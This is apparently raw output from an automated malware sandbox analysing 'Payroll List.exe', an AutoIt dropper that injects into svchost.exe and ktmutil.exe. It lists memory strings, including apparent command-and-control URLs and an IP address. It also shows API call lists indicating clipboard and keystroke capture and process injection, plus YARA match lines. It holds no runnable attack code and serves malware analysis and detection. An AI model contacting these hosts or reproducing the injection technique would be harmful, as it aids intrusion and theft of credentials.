0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003B80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3295460520.00000000052E3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.telforce.one
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3295460520.00000000052E3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.telforce.one/ykhz/
                Source: ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://34.92.79.175:19817
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 00000006.00000003.1933176968.0000000007638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ktmutil.exe, 00000006.00000002.3291580399.000000000282D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00176B0C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00176D07
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00176B0C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00162B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00162B37
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0018F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0018F7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: This is a third-party compiled AutoIt script.0_2_00123D19
                Source: Payroll List.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Payroll List.exe, 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_30df85fd-6
                Source: Payroll List.exe, 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d51a3dae-a
                Source: Payroll List.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e6868272-d
                Source: Payroll List.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd607bf1-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C883 NtClose,2_2_0042C883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E14340 NtSetContextThread,LdrInitializeThunk,6_2_02E14340
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E14650 NtSuspendThread,LdrInitializeThunk,6_2_02E14650
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12AF0 NtWriteFile,LdrInitializeThunk,6_2_02E12AF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12AD0 NtReadFile,LdrInitializeThunk,6_2_02E12AD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02E12BE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02E12BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02E12BA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12B60 NtClose,LdrInitializeThunk,6_2_02E12B60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02E12EE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02E12E80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12FE0 NtCreateFile,LdrInitializeThunk,6_2_02E12FE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12FB0 NtResumeThread,LdrInitializeThunk,6_2_02E12FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12F30 NtCreateSection,LdrInitializeThunk,6_2_02E12F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02E12CA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12C60 NtCreateKey,LdrInitializeThunk,6_2_02E12C60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02E12C70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02E12DF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12DD0 NtDelayExecution,LdrInitializeThunk,6_2_02E12DD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02E12D30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02E12D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E135C0 NtCreateMutant,LdrInitializeThunk,6_2_02E135C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E139B0 NtGetContextThread,LdrInitializeThunk,6_2_02E139B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12AB0 NtWaitForSingleObject,6_2_02E12AB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12B80 NtQueryInformationFile,6_2_02E12B80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12EA0 NtAdjustPrivilegesToken,6_2_02E12EA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12E30 NtWriteVirtualMemory,6_2_02E12E30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12FA0 NtQuerySection,6_2_02E12FA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12F90 NtProtectVirtualMemory,6_2_02E12F90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12F60 NtCreateProcessEx,6_2_02E12F60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12CF0 NtOpenProcess,6_2_02E12CF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12CC0 NtQueryVirtualMemory,6_2_02E12CC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12C00 NtQueryInformationProcess,6_2_02E12C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12DB0 NtEnumerateKey,6_2_02E12DB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12D00 NtSetInformationFile,6_2_02E12D00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13090 NtSetValueKey,6_2_02E13090
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13010 NtOpenDirectoryObject,6_2_02E13010
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13D70 NtOpenThread,6_2_02E13D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13D10 NtOpenProcessToken,6_2_02E13D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_00429280 NtCreateFile,6_2_00429280
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004293F0 NtReadFile,6_2_004293F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004294F0 NtDeleteFile,6_2_004294F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004295A0 NtClose,6_2_004295A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_00429700 NtAllocateVirtualMemory,6_2_00429700
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00166606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00166606
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0015ACC5
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001679D3
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014B0430_2_0014B043
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015410F0_2_0015410F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001402A40_2_001402A4
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015038E0_2_0015038E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0012E3B00_2_0012E3B0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015467F0_2_0015467F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001406D90_2_001406D9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0018AACE0_2_0018AACE
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00154BEF0_2_00154BEF
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014CCC10_2_0014CCC1
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00126F070_2_00126F07
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0012AF500_2_0012AF50
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013B11F0_2_0013B11F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001831BC0_2_001831BC
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014D1B90_2_0014D1B9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001332000_2_00133200
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014123A0_2_0014123A
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015724D0_2_0015724D
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001613CA0_2_001613CA
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001293F00_2_001293F0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013F5630_2_0013F563
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001296C00_2_001296C0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016B6CC0_2_0016B6CC
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001277B00_2_001277B0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0018F7FF0_2_0018F7FF
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001579C90_2_001579C9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013FA570_2_0013FA57
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00133B700_2_00133B70
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00129B600_2_00129B60
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00127D190_2_00127D19
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013FE6F0_2_0013FE6F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00149ED00_2_00149ED0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00127FA30_2_00127FA3
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D584680_2_00D58468
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004188F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403060
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004101CA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004101D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040235D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402360
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416B33
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004103F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402B95
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402BA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E46B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EEA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960F30
